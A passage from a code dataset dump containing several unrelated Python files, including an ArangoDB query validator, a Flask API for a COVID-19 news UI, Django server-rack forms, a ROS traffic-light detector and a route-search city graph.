'properties': {\n 'name': {'type': 'string'},\n 'params': {'type': 'object'},\n 'query_prefix': {'type': 'string'},\n 'query': {'type': 'string'}\n }\n}\n\n\ndef validate_stored_queries():\n \"\"\"Validate the structure and syntax of all the queries.\"\"\"\n print('Validating AQL queries..')\n names = set() # type: set\n for path in glob.iglob('stored_queries/**/*.yaml', recursive=True):\n print(f' validating {path}..')\n with open(path) as fd:\n data = yaml.safe_load(fd)\n jsonschema.validate(data, stored_query_schema)\n name = data['name']\n filename = os.path.splitext(os.path.basename(path))[0]\n if name != filename:\n _fatal(f'Name key should match filename: {name} vs {filename}')\n if name in names:\n _fatal(f'Duplicate queries named {name}')\n else:\n names.add(name)\n # Make sure `params` can be used as a JSON schema\n if data.get('params'):\n # Make sure it can be used as a JSON schema\n # If the schema is invalid, a SchemaError will get raised\n # Otherwise, the schema will work and a ValidationError will get raised (what we want)\n try:\n jsonschema.validate({}, data['params'])\n except ValidationError:\n pass\n # Params must be of type 'object'\n if data['params'].get('type') != 'object':\n _fatal(\"Params schema must have type 'object'\")\n query = data.get('query_prefix', '') + ' ' + data['query']\n # Parse the AQL query on arangodb\n url = _CONF['db_url'] + '/_api/query'\n resp = requests.post(url, data=json.dumps({'query': query}), auth=_CONF['db_auth'])\n parsed = resp.json()\n if parsed['error']:\n _fatal(parsed['errorMessage'])\n query_bind_vars = set(parsed['bindVars'])\n params = set(data.get('params', {}).get('properties', {}).keys())\n if params != query_bind_vars:\n _fatal((f\"Bind vars are invalid.\\n\"\n f\" Extra vars in query: {query_bind_vars - params}.\\n\"\n f\" Extra params in schema: {params - query_bind_vars}\"))\n print(f'✓ {path} is valid.')\n print('..all valid.')\n\n\n# JSON schema for arangosearch views found in /views\nview_schema = {\n \"type\": \"object\",\n \"required\": [\"name\", \"type\"],\n \"properties\": {\n \"name\": {\n 'title': 'View name',\n \"type\": \"string\",\n \"format\": r'^[a-z_]+$'\n },\n 'type': {\n 'type': 'string',\n 'enum': ['arangosearch']\n }\n }\n}\n\n\ndef validate_views():\n \"\"\"Validate the structure and syntax of arangosearch views\"\"\"\n print('Validating views..')\n names = set() # type: set\n for path in glob.iglob('views/**/*.json', recursive=True):\n print(f' validating 
{path}..')\n        with open(path) as fd:\n            data = json.load(fd)\n        jsonschema.validate(data, view_schema)\n        name = data['name']\n        filename = os.path.splitext(os.path.basename(path))[0]\n        if name != filename:\n            _fatal(f'Name key should match filename: {name} vs {filename}')\n        if name in names:\n            _fatal(f'Duplicate queries named {name}')\n        else:\n            names.add(name)\n\n        print(f'✓ {name} is valid.')\n    print('..all valid.')\n\n\ndef _fatal(msg):\n    \"\"\"Fatal error.\"\"\"\n    sys.stderr.write(str(msg) + '\\n')\n    sys.exit(1)\n\n\nif __name__ == '__main__':\n    wait_for_arangodb()\n    validate_json_schemas()\n    validate_stored_queries()\n    validate_views()\n","sub_path":"test/validate.py","file_name":"validate.py","file_ext":"py","file_size_in_byte":6779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"366707518","text":"import socket\nimport sys\n\n\ndef main():\n    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    s.connect((\"localhost\", 8080))\n    s.sendall(b\"GET / HTTP/1.1\\r\\n\\r\\n\")\n    while True:\n        sys.stdout.buffer.write(s.recv(16384))\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"bench_socket.py","file_name":"bench_socket.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"243700776","text":"import flopy\nimport numpy as np\n\n\ndef drop_iface(rec):\n    \"\"\"\n    Removes 'iface' column from stress period data recarray\n    \"\"\"\n    index = rec.dtype.names.index('iface')\n    list_ = rec.tolist()\n    for row, i in enumerate(list_):\n        list_[row] = list(i)\n        del list_[row][index]\n    return list_\n\ndef update_mt_spd(model_object, stress_periods):\n    \"\"\"\n    Rewrites mt3d models spd packages to start/end transient stress_periods\n    \"\"\"\n    mt3d_spd_packages = {'SSM': flopy.mt3d.Mt3dSsm}\n\n    print('Reading stress-period-data of the given model object...')\n    print(' '.join(\n        [\n            'Writing new packages for stress periods ',\n            str(stress_periods[0]),\n            ':',\n            str(stress_periods[-1])\n        ]\n    )\n    )\n\n    for package_name in model_object.get_package_list():\n        if package_name in mt3d_spd_packages:\n            print('Preparing SPD for ' + package_name + ' package')\n            package = model_object.get_package(package_name)\n            print('\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"')\n            print(package.stress_period_data.data)\n            spd = {k: v for\n                   k, v in package.stress_period_data.data.items()\n                   if stress_periods[0] <= k <= stress_periods[-1]}\n\n            if 'iface' in spd[stress_periods[0]].dtype.names:\n                print('Removing IFACE from ' + package_name + ' package SPD')\n                spd = {k: drop_iface(v) for k, v in spd.items()}\n\n            mt3d_spd_packages[package_name] = mt3d_spd_packages[package_name](\n                model_object,\n                stress_period_data=spd\n            )\n        # if package_name == 'BTN':\n        #     print('Preparing BTN package')\n        #     btn = flopy.mt3d.Mt3dBtn(model_object)\n        \n        #     perlen = btn.perlen.array[stress_periods[0]:stress_periods[-1] + 1]\n        #     nstp = btn.nstp.array[stress_periods[0]:stress_periods[-1] + 1]\n        #     nper = len(stress_periods)\n\n    return model_object\n\n\n\ndef update_mf_spd(model_object, stress_periods):\n    \"\"\"\n    Rewrites modflows models spd packages to start/end transient stress_periods\n    \"\"\"\n\n    modflow_spd_packages = {'WEL': flopy.modflow.ModflowWel,\n                            'LAK': flopy.modflow.ModflowLak,\n                            'RIV': flopy.modflow.ModflowRiv,\n                            'CHD': flopy.modflow.ModflowChd,\n                            'GHB': flopy.modflow.ModflowGhb}\n\n    print('Reading stress-period-data of the given model object...')\n    print(' '.join(\n        [\n            
'Writing new packages for stress periods ',\n            str(stress_periods[0]),\n            ':',\n            str(stress_periods[-1])\n        ]\n    )\n    )\n\n    for package_name in model_object.get_package_list():\n        if package_name in modflow_spd_packages:\n            print('Preparing SPD for ' + package_name + ' package')\n            package = model_object.get_package(package_name)\n            spd = {k: v for\n                   k, v in package.stress_period_data.data.items()\n                   if stress_periods[0] <= k <= stress_periods[-1]}\n\n            if 'iface' in spd[stress_periods[0]].dtype.names:\n                print('Removing IFACE from ' + package_name + ' package SPD')\n                spd = {k: drop_iface(v) for k, v in spd.items()}\n\n            modflow_spd_packages[package_name] = modflow_spd_packages[package_name](\n                model_object,\n                stress_period_data=spd\n            )\n\n        if package_name == 'DIS':\n            print('Preparing DIS package')\n            dis = model_object.get_package(package_name)\n            perlen = dis.perlen.array[stress_periods[0]:stress_periods[-1] + 1]\n            nstp = dis.nstp.array[stress_periods[0]:stress_periods[-1] + 1]\n            steady = dis.steady.array[stress_periods[0]:stress_periods[-1] + 1]\n            nper = len(perlen)\n            delc = dis.delc.array\n            delr = dis.delr.array\n            nlay = dis.nlay\n            nrow = dis.nrow\n            ncol = dis.ncol\n            top = dis.top.array\n            botm = dis.botm.array\n            laycbd = dis.laycbd.array\n            dis_new = flopy.modflow.ModflowDis(\n                model_object, nlay=nlay, nrow=nrow, ncol=ncol,\n                delr=delr, delc=delc, top=top, steady=steady,\n                botm=botm, laycbd=laycbd, perlen=perlen, nstp=nstp,\n                nper=nper\n            )\n\n    return model_object\n","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"243792340","text":"\"\"\"An API server for covid-19-ui.\"\"\"\nimport json\nimport os\n\nfrom mojimoji import han_to_zen\nfrom flask import Flask, request, jsonify\nfrom flask_cors import CORS\n\nfrom util import load_config\nfrom database import DBHandler\n\nhere = os.path.dirname(os.path.abspath(__file__))\ncfg = load_config()\n\napp = Flask(__name__)\nCORS(app, origins=cfg['access_control_allow_origin'])\n\nmongo = DBHandler(\n    host=cfg['database']['host'],\n    port=cfg['database']['port'],\n    db_name=cfg['database']['db_name'],\n    collection_name=cfg['database']['collection_name'],\n    es_host=cfg['es']['host'],\n    es_port=cfg['es']['port'],\n)\n\n\nclass InvalidUsage(Exception):\n\n    status_code = 400\n\n    def __init__(self, message, status_code=None, payload=None):\n        Exception.__init__(self)\n        self.message = message\n        if status_code is not None:\n            self.status_code = status_code\n        self.payload = payload\n\n    def to_dict(self):\n        rv = dict(self.payload or ())\n        rv['message'] = self.message\n        return rv\n\n\nclass InvalidPassword(Exception):\n\n    status_code = 403\n\n    def __init__(self, message, status_code=None, payload=None):\n        Exception.__init__(self)\n        self.message = message\n        if status_code is not None:\n            self.status_code = status_code\n        self.payload = payload\n\n    def to_dict(self):\n        rv = dict(self.payload or ())\n        rv['message'] = self.message\n        return rv\n\n\n@app.route('/')\ndef index():\n    return 'it works'\n\n\ndef get_start() -> int:\n    start = request.args.get('start', '0')  # NOTE: set the default value as a string object.\n    if not start.isdecimal():\n        raise InvalidUsage('Parameter `start` must be an integer.')\n    return int(start)\n\n\ndef get_limit() -> int:\n    limit = request.args.get('limit', '10')  # NOTE: set the default value as a string object.\n    if not limit.isdecimal():\n        raise InvalidUsage('Parameter `limit` must be an integer.')\n    return 
int(limit)\n\n\ndef get_lang() -> str:\n lang = request.args.get('lang', 'ja')\n if lang not in {'ja', 'en'}:\n raise InvalidUsage('Allowed languages are `ja` and `en`.')\n return lang\n\n\ndef get_query() -> str:\n return request.args.get('query', '')\n\n\n@app.route('/classes')\n@app.route('/classes/')\n@app.route('/classes//')\ndef classes(class_=None, country=None):\n return jsonify(mongo.classes(class_, country, get_start(), get_limit(), get_lang(), get_query()))\n\n\n@app.route('/countries')\n@app.route('/countries/')\n@app.route('/countries//')\ndef countries(country=None, class_=None):\n return jsonify(mongo.countries(country, class_, get_start(), get_limit(), get_lang()))\n\n\n@app.route('/update', methods=['POST'])\ndef update():\n data = request.get_json()\n\n if data.get('password') != cfg['password']:\n raise InvalidPassword('The password is not correct')\n\n return jsonify(mongo.update_page(\n url=data.get('url'),\n is_about_covid_19=data.get('is_about_COVID-19'),\n is_useful=data.get('is_useful'),\n is_about_false_rumor=data.get('is_about_false_rumor'),\n icountry=data.get('new_displayed_country'),\n etopics=data.get('new_classes'),\n notes=han_to_zen(str(data.get('notes'))),\n category_check_log_path=cfg['database']['category_check_log_path']\n ))\n\n\n@app.route('/history', methods=['GET'])\ndef history():\n url = request.args.get('url')\n with open(cfg['database']['category_check_log_path'], mode='r') as f:\n for line in f.readlines()[::-1]:\n if line.strip():\n edited_info = json.loads(line.strip())\n if edited_info.get('url', '') == url:\n edited_info['is_checked'] = 1\n return jsonify(edited_info)\n return jsonify({'url': url, 'is_checked': 0})\n\n\n@app.route('/meta')\ndef meta():\n lang = get_lang()\n with open(os.path.join(here, 'data', 'meta.json')) as f:\n meta_info = json.load(f)\n\n def reshape_country(country):\n return {\n 'country': country['country'],\n 'name': country['name'][lang],\n 'language': country['language'],\n 'representativeSiteUrl': country['representativeSiteUrl']\n }\n\n meta_info = {\n 'topics': [topic[lang] for topic in meta_info['topics']],\n 'countries': [reshape_country(country) for country in meta_info['countries']]\n }\n\n with open(os.path.join(here, 'data', 'stats.json')) as f:\n stats_info = json.load(f)['stats']\n\n with open(os.path.join(here, 'data', 'sources.json')) as f:\n sources_info = json.load(f)\n\n country_code_index_map = {country['country']: i for i, country in enumerate(meta_info['countries'])}\n for country_code in stats_info:\n meta_info['countries'][country_code_index_map[country_code]]['stats'] = stats_info[country_code]\n meta_info['countries'][country_code_index_map[country_code]]['sources'] = sources_info[country_code]\n\n return jsonify(meta_info)\n\n\n@app.errorhandler(InvalidUsage)\ndef handle_invalid_usage(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n\n\n@app.errorhandler(InvalidPassword)\ndef handle_invalid_password(error):\n response = jsonify(error.to_dict())\n response.status_code = error.status_code\n return response\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227086563","text":"#!/usr/bin/env python\n\n\"\"\"\nСоздать текстовый файл (не программно), построчно записать фамилии сотрудников и величину их окладов.\nОпределить, кто из сотрудников имеет оклад менее 20 тыс., вывести фамилии этих 
сотрудников.\nВыполнить подсчет средней величины дохода сотрудников.\n\"\"\"\n\nTEXT_FILE = \"task03.txt\"\nWORKERS = []\n\n\ndef read_file(file_name):\n try:\n with open(file_name, \"r\") as t_file:\n for line in t_file:\n t = line.split(\",\")\n worker = {\n \"Last name\": t[0],\n \"Salary\": int(t[1])\n }\n WORKERS.append(worker)\n except FileNotFoundError:\n print(f\"File '{TEXT_FILE}' not found\")\n exit(1)\n\n\ndef calculate_statistic(workers):\n low_payed_workers = []\n avg_salary = 0\n for worker in workers:\n avg_salary += worker[\"Salary\"]\n if worker[\"Salary\"] < 20000:\n low_payed_workers.append(worker[\"Last name\"])\n\n avg_salary = avg_salary / len(workers)\n\n print(f\"Average salary: {avg_salary}\")\n print(f\"Worker with salary less than 20k: {low_payed_workers}\")\n\n\ndef main():\n read_file(TEXT_FILE)\n calculate_statistic(WORKERS)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"lesson-5/task03.py","file_name":"task03.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"452466897","text":"# coding: utf-8\nfrom django import forms\nfrom django.utils.translation import ugettext as _\n\nfrom crispy_forms.helper import FormHelper\nfrom crispy_forms.layout import Layout, Div, Submit, HTML, Button, Row, Field\nfrom crispy_forms.bootstrap import AppendedText, PrependedText, FormActions\n\nfrom erp_test.models import Basket, Rack, Server\nfrom erp_test.exceptions import BasketIsFilled, BasketSlotIsBusy\n\n\nclass BasketForm(forms.ModelForm):\n\n helper = FormHelper()\n helper.form_class = 'form-horizontal'\n helper.layout = Layout(\n Div(\n Div('name'),\n css_class='row-fluid'\n ),\n Div(\n Div('slot_qty'),\n css_class='row-fluid'\n ),\n Div(\n Div('unit_takes'),\n css_class='row-fluid'\n ),\n\n FormActions(\n Submit('save_changes', _('Save changes'), css_class=\"btn-primary\"),\n Submit('cancel', 'Cancel'),\n )\n )\n\n class Meta:\n model = Basket\n fields = ('name', 'slot_qty', 'unit_takes')\n\n\nclass BasketRackForm(forms.Form):\n\n rack = forms.ChoiceField(\n choices=[('', 'Choose a rack')],\n required=True,\n help_text='displayed only racks with enough gap for the basket')\n position = forms.IntegerField(\n required=False,\n min_value=1)\n\n def __init__(self, *args, **kwargs):\n self.basket = kwargs.pop('basket', None)\n super(BasketRackForm, self).__init__(*args, **kwargs)\n if self.basket:\n racks = Rack.objects.with_fullness('has_empty_height', self.basket.get_height())\n if self.basket.rack:\n racks = list(racks.exclude(id=self.basket.rack.pk))\n racks.insert(0, self.basket.rack)\n self.fields['rack'].choices += [\n (r.id, r.get_name())\n for r in racks\n ]\n\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.form_class = 'form-horizontal'\n self.helper.layout = Layout(\n Div(\n Div('rack'),\n css_class='row-fluid'\n ),\n Div(\n Div('position'),\n css_class='row-fluid'\n ),\n\n FormActions(\n Submit('save_changes', _('Save changes'), css_class=\"btn-primary\"),\n Submit('cancel', 'Cancel'),\n )\n )\n\n\nclass BasketServerForm(forms.Form):\n\n server = forms.ChoiceField(\n choices=[('', 'Choose a server')],\n required=True,\n help_text='displayed only uninstalled servers')\n position = forms.IntegerField(\n required=False,\n min_value=1)\n\n def __init__(self, *args, **kwargs):\n self.basket = kwargs.pop('basket', None)\n self.server = kwargs.pop('server', None)\n super(BasketServerForm, self).__init__(*args, **kwargs)\n\n servers = 
Server.objects.uninstalled()\n if self.server:\n servers = list(servers.exclude(id=self.server.pk))\n servers.insert(0, self.server)\n self.fields['server'].choices += [\n (s.id, s.get_name())\n for s in servers\n ]\n\n self.helper = FormHelper()\n self.helper.form_tag = False\n self.helper.form_class = 'form-horizontal'\n self.helper.layout = Layout(\n Div(\n Div('server'),\n css_class='row-fluid'\n ),\n Div(\n Div('position'),\n css_class='row-fluid'\n ),\n\n FormActions(\n Submit('save_changes', _('Save changes'), css_class=\"btn-primary\"),\n Submit('cancel', 'Cancel'),\n )\n )\n\n def clean_position(self):\n pos = self.cleaned_data.get('position', None)\n if not pos:\n try:\n pos = self.basket.find_free_position()\n except BasketIsFilled:\n raise forms.ValidationError(_('Basket has no free slots.'), code='invalid')\n\n if pos > self.basket.slot_qty:\n raise forms.ValidationError(_('Basket has only {} slots.').format(self.basket.slot_qty), code='invalid')\n\n try:\n self.basket.validate_position(pos)\n except BasketSlotIsBusy:\n raise forms.ValidationError(_('This slot already taken.'), code='invalid')\n\n return pos\n","sub_path":"src/mbtest1/erp_client/forms/baskets.py","file_name":"baskets.py","file_ext":"py","file_size_in_byte":4396,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"158172269","text":"#!/usr/bin/env python\nimport math\nimport rospy\nfrom std_msgs.msg import Int32\nfrom geometry_msgs.msg import PoseStamped, Pose, Point\nfrom styx_msgs.msg import TrafficLightArray, TrafficLight\nfrom styx_msgs.msg import Lane\nfrom sensor_msgs.msg import Image\nfrom cv_bridge import CvBridge\nfrom light_classification.tl_classifier import TLClassifier\nimport tf\n#from math import inf\nimport numpy as np\nimport cv2\nimport yaml\nimport math\nimport time\n\nSTATE_COUNT_THRESHOLD = 3\n\nclass TLDetector(object):\n def __init__(self):\n rospy.init_node('tl_detector')\n\n self.image_count = 467\n self.pose = None\n self.waypoints = None\n self.camera_image = None\n self.lights = []\n\n # can be used used to determine the vehicle's location.\n sub1 = rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb)\n # provides the complete list of waypoints for the course.\n sub2 = rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb)\n\n '''\n /vehicle/traffic_lights provides you with the location of the traffic light in 3D map space and\n helps you acquire an accurate ground truth data source for the traffic light\n classifier by sending the current color state of all traffic lights in the\n simulator. When testing on the vehicle, the color state will not be available. You'll need to\n rely on the position of the light and the camera image to predict it.\n '''\n sub3 = rospy.Subscriber('/vehicle/traffic_lights', TrafficLightArray, self.traffic_cb)\n\n # provides an image stream from the car's camera. 
These images are used to determine the color of upcoming traffic lights.\n sub6 = rospy.Subscriber('/image_color', Image, self.image_cb)\n\n config_string = rospy.get_param(\"/traffic_light_config\")\n self.config = yaml.load(config_string)\n\n self.upcoming_red_light_pub = rospy.Publisher('/traffic_waypoint', Int32, queue_size=1)\n\n self.bridge = CvBridge()\n self.light_classifier = TLClassifier()\n self.listener = tf.TransformListener()\n\n self.state = TrafficLight.UNKNOWN\n self.last_state = TrafficLight.UNKNOWN\n self.last_wp = -1\n self.state_count = 0\n\n self.closest_waypoint = 0\n\n self.IGNORE_DISTANCE_LIGHT = 90.0\n self.old_stop_line_pos_wp = []\n self.last_car_position = 0\n rospy.spin()\n\n def pose_cb(self, msg):\n self.pose = msg\n\n def waypoints_cb(self, waypoints):\n self.waypoints = waypoints.waypoints\n\n def traffic_cb(self, msg):\n self.lights = msg.lights\n\n def image_cb(self, msg):\n \"\"\"Identifies red lights in the incoming camera image and publishes the index\n of the waypoint closest to the red light's stop line to /traffic_waypoint\n\n Args:\n msg (Image): image from car-mounted camera\n\n \"\"\"\n #rospy.loginfo('image_cb')\n start_time = time.time()\n\n self.has_image = True\n self.camera_image = msg\n light_wp, state = self.process_traffic_lights()\n rospy.loginfo('tl state = ' + str(state))\n\n '''\n Publish upcoming red lights at camera frequency.\n Each predicted state has to occur `STATE_COUNT_THRESHOLD` number\n of times till we start using it. Otherwise the previous stable state is\n used.\n '''\n if self.state != state:\n self.state_count = 0\n self.state = state\n elif self.state_count >= STATE_COUNT_THRESHOLD:\n self.last_state = self.state\n light_wp = light_wp if state == TrafficLight.RED else -1\n self.last_wp = light_wp\n self.upcoming_red_light_pub.publish(Int32(light_wp))\n else:\n self.upcoming_red_light_pub.publish(Int32(self.last_wp))\n self.state_count += 1\n \n elapsed_time = time.time() - start_time\n rospy.loginfo('image_cb time = %0.1fus\\n' % (1000.0*1000*elapsed_time))\n\n\n def get_closest_waypoint(self, pose):\n \"\"\"Identifies the closest path waypoint to the given position\n https://en.wikipedia.org/wiki/Closest_pair_of_points_problem\n Args:\n pose (Pose): position to match a waypoint to\n Returns:\n int: index of the closest waypoint in self.waypoints\n \"\"\"\n \n pos = pose.position\n l_id = 0\n r_id = len(self.waypoints) - 1\n m_id = len(self.waypoints)-1\n\n while l_id < r_id:\n ldist = self.pos_distance(self.waypoints[l_id].pose.pose.position, pos)\n rdist = self.pos_distance(self.waypoints[r_id].pose.pose.position, pos)\n xmid = (l_id + r_id) // 2\n mdist = self.pos_distance(self.waypoints[xmid].pose.pose.position, pos)\n\n closest_dist = ldist\n m_id = l_id\n if mdist < closest_dist:\n closest_dist = mdist\n m_id = xmid\n if rdist < closest_dist:\n closest_dist = rdist\n m_id = r_id\n\n # If l_id is right before xmid and xmid is right before r_id,\n # then xmid is the closest waypoint\n if l_id == xmid -1 and xmid == r_id -1:\n break\n\n # c: car\n # l: left point\n # r: right point\n # m: xmid\n # *: closest waypoint\n if rdist < mdist:\n if ldist < rdist:\n # l--c----r--m\n r_id = xmid - 1\n else:\n # l----c--r--m\n l_id = xmid + 1\n\n elif mdist < closest_dist:\n # l--c--m--*--r\n l_id = xmid-1\n elif mdist > closest_dist :\n # l--c--*--m--r\n r_id = xmid+1\n\n elif mdist == closest_dist:\n # ?-cm-?\n if ldist < rdist:\n # l--cm---r\n r_id = xmid + (r_id - xmid) // 2\n elif rdist < ldist:\n # l---cm--r\n l_id = 
xmid - (xmid - l_id) // 2\n\n return m_id\n\n def pos_distance(self, a, b):\n \"\"\" Distance between two positions\n \"\"\"\n return math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)\n\n def distance_2d(self, a, b):\n return math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2)\n\n def project_to_image_plane(self, point_in_world):\n \"\"\"Project point from 3D world coordinates to 2D camera image location\n\n Args:\n point_in_world (Point): 3D location of a point in the world\n\n Returns:\n x (int): x coordinate of target point in image\n y (int): y coordinate of target point in image\n\n \"\"\"\n\n\n # From udacity.\n fx = 2574\n fy = 2744\n image_width = self.config['camera_info']['image_width']\n image_height = self.config['camera_info']['image_height']\n\n trans = None\n\n try:\n now = rospy.Time.now()\n self.listener.waitForTransform(\"/base_link\",\n \"/world\", now, rospy.Duration(1.0))\n (trans, rot) = self.listener.lookupTransform(\"/base_link\",\n \"/world\", now)\n\n except (tf.Exception, tf.LookupException, tf.ConnectivityException):\n rospy.logerr(\"Failed to find camera to map transform\")\n\n # Use tranform and rotation to calculate 2D position of light in image\n if (trans != None):\n # Convert rotation vector so we can use it.\n yaw = tf.transformations.euler_from_quaternion(rot)[2]\n\n # Rotation followed by translation\n px = point_in_world.x\n py = point_in_world.y\n pz = point_in_world.z\n xt = trans[0]\n yt = trans[1]\n zt = trans[2]\n\n Rnt = (\n px * math.cos(yaw) - py * math.sin(yaw) + xt,\n px * math.sin(yaw) + py * math.cos(yaw) + yt,\n pz + zt)\n\n u = int(fx * -Rnt[1] / Rnt[0] + image_width / 2 - 30)\n v = int(fy * -(Rnt[2] - 1.0) / Rnt[0] + image_height + 50)\n\n light_width = 1.0\n light_height = 1.95\n\n distance = self.distance_2d(self.pose.pose.position, point_in_world)\n\n # Size of traffic light within 2D picture\n light_width_estimate = 2 * fx * math.atan(light_width / (2 * distance))\n light_height_estimate = 2 * fx * math.atan(light_height / (2 * distance))\n # Get points for traffic light's bounding box\n bbox_topleft = (int(u - light_width_estimate / 2), int(v - light_height_estimate / 2))\n bbox_bottomright = (int(u + light_width_estimate / 2), int(v + light_height_estimate / 2))\n else:\n # No translation matrix so we cannot find the light.\n bbox_topleft = (0, 0)\n bbox_bottomright = (0, 0)\n\n return (bbox_topleft, bbox_bottomright)\n\n\n def resize_image(self, img, width, height):\n \n aspect_ratio_width = 0.5\n aspect_ratio_height = height/width\n img_height, img_width = img.shape[:2]\n crop_height = int(img_width / aspect_ratio_width)\n extra_height = (img_height - crop_height) / 2\n crop_width = int(img_height / aspect_ratio_height)\n extra_width = (img_width - crop_width) / 2\n # Crop image to keep aspect ratio\n if extra_height > 0:\n crop_img = img[int(extra_height):int(img_height-math.ceil(extra_height)), 0:int(img_width)]\n elif extra_width > 0:\n crop_img = img[0:int(img_height), int(extra_width):int(img_width-math.ceil(extra_width))]\n else:\n crop_img = img\n\n return cv2.resize(crop_img, (width, height), 0, 0, interpolation=cv2.INTER_AREA)\n\n def get_light_state(self, light):\n \"\"\"Determines the current color of the traffic light\n\n Args:\n light (TrafficLight): light to classify\n\n Returns:\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n\n \"\"\"\n if(not self.has_image):\n self.prev_light_loc = None\n return False\n\n cv_image = self.bridge.imgmsg_to_cv2(self.camera_image, \"bgr8\")\n\n pt = Point()\n pt.x = 
light.pose.pose.position.x\n pt.y = light.pose.pose.position.y\n pt.z = 0\n \n # Convert given traffic light coordinates into position within 2D image\n tleft, bright = self.project_to_image_plane(light.pose.pose.position)\n cropped_image = cv_image[tleft[1]:bright[1], tleft[0]:bright[0]]\n\n if (cropped_image.shape[0] > 0 and cropped_image.shape[1] > 0):\n cropped_image = self.resize_image(cropped_image, 30, 60)\n\n #Get classification\n clazz = self.light_classifier.get_classification(cropped_image)\n #rospy.loginfo(clazz)\n\n return clazz\n\n def process_traffic_lights(self):\n \"\"\"Finds closest visible traffic light, if one exists, and determines its\n location and color\n Returns:\n int: index of waypoint closes to the upcoming stop line for a traffic light (-1 if none exists)\n int: ID of traffic light color (specified in styx_msgs/TrafficLight)\n \"\"\"\n light = None\n #rospy.loginfo('self.waypoints = ' + str(self.waypoints))\n\n if self.waypoints is None:\n rospy.logerr('self.waypoints is None')\n\n if self.waypoints is not None:\n # List of positions that correspond to the line to stop in front of for a given intersection\n stop_line_positions = self.config['stop_line_positions']\n if(self.pose):\n car_position = self.get_closest_waypoint(self.pose.pose)\n\n #find the closest visible traffic light (if one exists)\n light = self.get_closest_light(self.pose.pose)\n\n if light:\n light_wp = self.get_closest_waypoint(light.pose.pose)\n state = self.get_light_state(light)\n\n # Debugging traffic light:\n #\n # rospy.loginfo(\"light_xyz: ({}, {}, {}), wp_xyz({}): ({}, {}, {})\".format(\n # light.pose.pose.position.x,\n # light.pose.pose.position.y,\n # light.pose.pose.position.z,\n # light_wp,\n # self.waypoints[light_wp].pose.pose.position.x,\n # self.waypoints[light_wp].pose.pose.position.y,\n # self.waypoints[light_wp].pose.pose.position.z\n # ))\n return light_wp, state\n #self.waypoints = None\n return -1, TrafficLight.UNKNOWN\n\n def get_closest_light(self, pose):\n \"\"\" Get the position of the closest traffic light.\n\n Args:\n pose (Pose): Position of car.\n Returns:\n TrafficLight: light object.\n \"\"\"\n # Decide if we should have a horizon (a max distance at which the car will try and capture the light).\n horizon = 100\n\n min_dist = float(\"inf\")\n light = None\n #rospy.loginfo('self.lights = ' + str(self.lights))\n\n for l in self.lights:\n dist = self.pos_distance(pose.position, l.pose.pose.position)\n if dist < min_dist and dist < horizon:\n min_dist = dist\n light = l\n return light\n\nif __name__ == '__main__':\n try:\n TLDetector()\n except rospy.ROSInterruptException:\n rospy.logerr('Could not start traffic node.')\n","sub_path":"ros/src/tl_detector/tl_detector.py","file_name":"tl_detector.py","file_ext":"py","file_size_in_byte":13610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"411145316","text":"\nfrom googlestaticmaps import get_map_at_lonlat, GoogleMapType\n\n\n# Get google maps apikey\ntry:\n with open(\"googlemaps_apikey.txt\") as fh:\n googlemaps_apikey = fh.read()\n fh.close()\nexcept IOError:\n print(\"No google maps apikey found!\")\n quit(-1)\n\nimg = get_map_at_lonlat(11.620967, 48.316362, 16, apikey=googlemaps_apikey, imgSize=(700, 700), 
mapType=GoogleMapType.Hybrid).mapImage\nimg.show()\n","sub_path":"tests/show_kreuz_neufahrn.py","file_name":"show_kreuz_neufahrn.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"183318284","text":"from heapq import heappush\nfrom heapq import heappop\n\nclass City:\n def __init__(self,name, h):\n self.name = name\n self.neighboors = []\n self.h = h\n\n def addNeighboors(self,neighboors):\n for city in neighboors:\n self.neighboors.append(city)\n\narad = City('Arad', 366)\nzerind = City('Zerind', 374)\nsibiu = City('Sibiu', 253)\ntimisoara = City('Timisoara', 329)\noradea = City('Oradea', 380)\nlugoj = City('Lugoj', 244)\nfagaras = City('Fagaras', 178)\nvilcea = City('R. Vilcea', 193)\nmehadia = City('Mehadia', 241)\nbucharest = City('Bucharest', 0)\npitesti = City('Pitesti', 98)\ncraiova = City('Craiova', 160)\ndobreta = City('Dobreta', 242)\nurziceni = City('Urziceni', 80)\ngiurgiu = City('Giurgiu', 77)\nvaslui = City('Vaslui', 199)\nhirsova = City('Hirsova', 151)\niasi = City('Iasi', 226)\neforie = City('Eforie', 161)\nneamt = City('Neamt', 234)\n\narad.addNeighboors([(75, zerind), (140, sibiu), (118,timisoara)])\nzerind.addNeighboors([(71, oradea), (75, arad)])\nsibiu.addNeighboors([(151,oradea), (140,arad), (99, fagaras), (80, vilcea)])\ntimisoara.addNeighboors([(118, arad), (111, lugoj)])\noradea.addNeighboors([(71,zerind), (151,sibiu)])\nlugoj.addNeighboors([(111,timisoara),(70, 